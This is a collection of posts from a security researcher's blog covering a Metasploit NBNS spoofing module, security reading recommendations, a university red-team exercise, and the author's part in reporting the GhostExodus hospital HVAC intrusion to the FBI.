Tim Medin, over at the excellent Packetstan blog, just wrote up an excellent post detailing the implementation of a NBNS spoofing module which has been added to the the latest Metasploit trunk:

This module is based off an old tool, nbnspoof.py, that I wrote to perform this attack, originally described (as nearly as I can tell) by Sumit Siddharth. It’s a very simple attack, taking advantage of the way Windows proceeds to NetBIOS Name Service lookups once local and DNS lookups fail. If you’ve ever turned a careful eye to broadcast traffic on any network with Windows systems, you’ve probably noticed that a surprising number of lookups fail through to NBNS for various reasons.

Tim does a great job of describing how the spoofing works, how to use it in the context of a penetration test, and how the module was developed. Due to its integration into the current version of the Metasploit framework, I’d have to say that I recommend it over the original python version. Maybe one day soon I’ll one-up him and try to turn it into a meterpreter post-exploitation script, in order to hijack remote hosts into being spoofers ;-) .

Until then, and in related news, I’ve submitted a talk on some other forms of Metasploit sorcery that I have developed recently to Defcon (and tomorrow to Blackhat once the CFP opens). With any luck I’ll be speaking at one or the other later this year. Either way, I’ll see some of my readers there, hopefully!


I really enjoy reading non-infosec books, audiobooks, articles and the like, consuming them with a mental exercise: finding out what lessons could be learned and applied to security.  My specific interests are in forensics, penetration testing, vulnerability analysis, exploit development, and profiling attackers.  Currently, as an occasional escape from technical material, I’m looking at some of Paul Ekman’s books on deception, with an eye for how it applies to topics like social engineering engagements, and even interactions with others in the infosec community.  Even with the controversy surrounding the research, there are some lessons to be learned, tricks to pick up, and things to think about.

As much as infosec professionals quote Sun Tzu’s The Art of War, I thought that I ought to check it out.  I downloaded a translation of it onto my iPod Touch and read through it in my spare time.  I felt as though I must have missed something, as I really didn’t see how most of it applied to security in anything more than a superficial way.

Now, at least I know that if I missed something, attrition.org missed it too.  They’ve posted a very well-reasoned analysis of the use of Sun Tzu’s work in infosec, pointing out all the places that it really doesn’t make sense.  Many of these are sticking points I also had when I tried to make the connection myself.  I especially agree with a fundamental point that the Attrition.org folk make: Defenders in infosec are strictly defenders, with their hands tied behind their backs when it comes to attacking the other side.  This is kind of a buzzkill for much of Tzu’s advice.

As with most Attrition.org articles, they pull no punches and call out people specifically.  This makes some readers uncomfortable, though I do think that it’s a fair and honest assessment.  Give it a shot if you’re looking for a good (and very different) read.

(Disclaimer: I have cooperated with the attrition.org guys on a couple of their writeups (though nothing compared to their original research), and I am pretty partial towards them and many of their views.  I just hope that if I ever stray into the danger zone of their “charlatan” list that I’ll have earned some kind of warning first ;) )


I’ve been busy this week teaching part of the intro series of courses we have at the National Forensics Training Center, but I still wanted to post a quick update.  I figured I’d share a few interesting things I read this week, and talk a bit about some extracurricular activities going on in our lab tommorow.

For a couple of weeks now, I’ve been using Instapaper to mark articles and sites to “Read Later”.  The benefit of Instapaper is, with the integration and sync’ing between all the different computers I use and (crucial) my iPod Touch, I actually wind up reading things that I intend to read later, instead of them just getting bookmarked and forgotten.  While I’m on WiFi I can sync them all up to the iPod and read them anywhere, offline, where I don’t have the distractions of grabbing new emails and messages.

Some things I star’d and enjoyed recently:

  • Should I Learn Assembly Language – HD Moore tackles the question of whether or not penetration testers have a need to learn assembly language.  Spoiler: The answer is, essentially: you can get away with not knowing it if you just use the shellcode in Metasploit, but it’s a must if use public-sourced exploits or just want to understand how the shellcode works (which you should).
  • Network Time Protocol (NTP) Fun – Cool little writeup over at the carnal0wnage blog about a new module in Metasploit that performs some information gathering over NTP.
  • Clueless FUD Article… – In which Steve Manzuik points out that there is a lot more information sharing going on behind the scenes in infosec than you might be aware of (or at least more than the author of a specific DarkReading article is aware of)

Tomorrow afternoon, a group of guys (who have historically done well in past CTF events here at the university) and I will be acting as the red team for a cyber-defense exercise being hosted by the University of Alaska Fairbanks.  They have a nice VMWare setup in Fairbanks that all of the teams will be remoting into, and we’re really looking forward to giving the participating universities a hard time.  If you happen to be one of the readers that local enough to Mississippi State University to drop by for a visit, feel free to come by the forensics lab in Butler Hall tomorrow between 1:30 and 7:30 PM to see how things are going.


If you took a look at the slides for Monday’s lecture (or were there in-person), you might recall that the last slide of content contained quotes from the ETA’s current site on the Internet, eoeta.com. The new leader, “Xon”, has disavowed the actions that led to the previous leader’s arrest, and is very firm in stating that the new ETA is “ethical” and no longer engages in illegal activities.

Registration on their forums has also opened up, and I was surprised that Xon made the goodwill gesture of activating the account I created the night before my lecture. Here’s a direct link to their forum section:

There are still posts on the forums that go back to just after Jesse “GhostExodus” McGraw’s arrest, before the ETA’s attempt to transform into a white-hat organization, so there is some pretty interesting reading there.  Registering an account and having it approved by an admin is required to gain access to the forums, however the process seems to go pretty fast.

Is the Electronik Tribulation Army really a white-hat group now?  While Xon may feel strongly about the transformation, he may find it difficult to bring the members in line for it.  With members like “E.T.A FIXER” (aka DarthAnonymous, TrashBagTeddy, etc.) that continued to troll the comments sections of this site, and scroll insults (and creative ASCII art) in this site’s IRC channel long after the arrest, other ETA members may find it difficult to convince others that they have truly abandoned their blackhat ways.

This is also the first time someone’s made a “motivational” poster about me.  Touching! :

(Credit goes to Fixer.  I did crop the image a bit.  You can find the original in a couple of threads on the ETA forums)


Much like last year, a few of the more high-profile talks from Black Hat this year have been released on the web site pretty soon after the conference:

The following talks have video available, as of this posting:

  • The Language of Trust: Exploiting Trust Relationships in Active Content – Mark Dowd, Ryan Smith, David Dewey
  • Something About Network Security – Dan Kaminsky
  • More Tricks for Defeating SSL – Moxie Marlinspike

Slides and papers are available for most of the other talks.

If anyone has a public (or private) lead on getting audio/video recordings for the rest of the conference, contact me.  I’m going to keep an eye out, and when I see anything new that’s publicly available, I’ll link it in a new post here.


Earlier today, this was making the rounds on twitter:

It’s a cute-looking manga-style comic about team Sapheads’ experiences with the “Binary 300″ challenge in the Defcon 17 CTF pre-quals.  It’s kind of entertaining, and looks informative, if a bit engrish-y.  I scrolled through it quickly, bookmarked it, and planned to give it a good read later.

At first glance, I especially liked that there was a female character on the team, which I thought could be a very positive thing.  That is, until I saw this making the rounds on twitter later today:

…the above is a discussion of the “Tiffany” character in the comic strip, who turns out to be a ridiculously stereotypical depiction of how some view women and computer security research.  Not only is “Tiffany” an offensive stereotype, she’s a terribly one-dimensional and annoying character, only serving as a foil.  She asks questions about what’s going on to give the other characters a chance to go into detail, acts all confused, and that’s about it.  I suppose the other characters are just too l33t to be able ask those questions of each other.

As far as I can tell from the original Binary 300 write-up and anything else I can find out about the Sapheads, the comic’s characters aren’t based on their actual team line-up.

The author of the Female Stereotypes post also relates her own experiences of how she’s treated as a female in security research, and it’s very eye opening.  I highly recommend reading it, as well as the original PDF writeup of the Sapheads attempt at this challenge.

Edit: The author/artist of the comic updated the page to apologize and explain.  In future comics on other challenges, the “Tiffany” character will serve a more useful role than “cheer-leader”.  It turns out that there is no female member of the Sapheads team, and that the character is based on a famous Korean singer.


If you haven’t read Part 1 of this story, then you really ought to take a look at it first.  It serves as a good overview, and the criminal complaint filed by the FBI is a good read.

Yesterday afternoon was GhostExodus’ detention hearing.  I’m not very familiar with the process one goes through after being arrested for something like this, so I had to look up what this meant.  I found the following site which, I believe, explains detention hearings well:

(Looks like a cool site beyond this, even.  Kind of a legal equivalent to the blog I run here.)

I was informed yesterday afternoon that the Judge in this case found that there was probable cause to detain Jesse McGraw while the case is pending.

Here are some links to the coverage this is getting.  I’m linking articles that I think my readers would enjoy, especially those where the reporters were thorough enough to contact me personally to get the stories:

The members of the press I’ve talked to on the phone and over IM have been very nice.  There are many more stories than this, you can poke around on Google News if you like, but your best source of technical information for fellow security and control-systems folks is going to be right here, of course :)

Now, time to break out the popcorn.  Here are two of the most interesting videos that were posted to GhostExodus’ youtube accounts.  It’s my understanding that these videos were played in court yesterday.  After each video, I’ve summarized some points of interest in each video:

  • “Post July 4th” is a strange choice of title here, as it’s before July 4th, and in preparation for the attacks scheduled for the 4th
  • He’s recording this by holding his laptop in front of him (reflections in elevator)
  • Claims to have infiltrated corporate offices, but it’s obviously a medical facility
  • Watch for medical charts and such on the walls when he sits down
  • Appears to be the collar of a security guard uniform peeking out of the top of the hoodie
  • The FBI identified this computer at the clinic by the toy flamingo on top of the monitor

  • This was recorded at a desk at the hospital where McGraw was a security guard.
  • I thought about buying one of those camera pens until I saw this.  Not inconspicuous.
  • Showing off your fake FBI credentials on youtube isn’t very smart.

I will continue this series with more posts, discussing the HVAC compromise, how I came to be aware of it, and the techniques I used to gather information on the suspect.  Still pooped from talking to so many people about this, but I’m enjoying spreading the gospel of control-systems security ;)


My phone has been blowing up most of the day about this. To sum it up: On the evening of the 18th, a script kiddie that was involved in a previous post on this site (“Perl Hacking is Dead”), XXxxImmortalxxXX, contacted me and began to brag about hacking a hospital’s HVAC system. Upon further googling, it became apparent that XXxxImmortalxxXX was lying to me, and that it was the leader of the group Immortal had joined that allegedly carried out the attack. This attacker went by the name of “GhostExodus”.

As most of my readers here know, my research area is control systems/SCADA, specifically human-machine interface (HMI) software. Being involved in a field that involves elements of our critical infrastructure, I know how serious an incident involving a hospital’s HVAC system can be. Screenshots taken by the attacker showed an HMI that gave the user control over many elements of the hospital, including pumps and chillers in the operating room. Messing around with a system like this can seriously impact the health and safety of the patients.

I spent a large amount of time that weekend gathering up information on GhostExodus, and his hacker group, the “Electronik Tribulation Army”. Monday, I met with my major professor at Mississippi State University’s Critical Infrastructure Protection Center, where I work as a Ph.D. research assistant. I presented the information I had found, and we contacted the Texas attorney general’s office and the Jackson, MS FBI office, where we already had contacts. For the rest of the week, I cooperated with the FBI by sharing the information that I had found. GhostExodus was picked up by the FBI on Friday night.

I plan on sharing more, because there’s a huge amount of interesting data, images, and video involved with this case. The alleged attacker uploaded many videos of his actions to Youtube and other sites, and when I put it all together into a coherent lecture, it should be pretty informative and entertaining. Until then, there’s plenty of media coverage of the arrest:

Google News shows over 170 related stories.

The best and most accurate thing to read, however, is the criminal complaint against “Jesse William McGraw”. I have been informed that this is part of public record, however I have taken the liberty of editing out SSNs, DLs, VINs and such on this copy:

(Edit: moved it offsite, because it was chewing bandwidth a lot more bandwidth than you’d expect.  You can read it online or download it from the above link)

If you’re reading the above, I’m “CW-1″.

I plan on keeping you updated on further developments and more information as this progresses. There will also likely be some very interesting multi-media talks and lectures I can give on this, so if you want me to take the show on the road, get in touch.

For now, though, I’ve had a long day, and I shall rest :)


…and not the economies of running a popular security conference ;-) .

I’m not usually one to just drop a link as a post, but this one totally deserves it:

Richard Bejtlich is right on target with this one.  He describes how a criminal element could spend a one million dollar budget on what would be a very successful, profitable, and sustainable hacking enterprise.

It’s an extremely entertaining and informative read.


I’ve spent some time looking at these posts over on Gustavo Duarte’s blog today, and I am very impressed.  Gustavo has taken the time to write an entire series of posts on x86 internals, focusing on how memory works and the boot-up process.  He uses Linux and, to a lesser extent, Windows in his examples, and has really great illustrations and diagrams of all the concepts.  Combine that with an excellent writing style and links to good reference material, and you have one of the most accessible and readable introductions to these topics that I’ve ever seen.  

Here are links to the topics from his “Internals” series, although his other writings are worth checking out too:

These are core concepts for those in the areas of vulnerability analysis, exploit development, and (good) penetration testing to know, so read up :) .

I ran across this blog from a link to the most recent post earlier this morning, and unfortunately I spent enough time at the site that I can’t even remember now where I found it.  Otherwise I would give some credit to person I’m following on twitter or RSS that linked it.  If that person happens to be you, leave a comment to claim your fame :) .

© 2012 McGrew Security Suffusion theme by Sayontan Sinha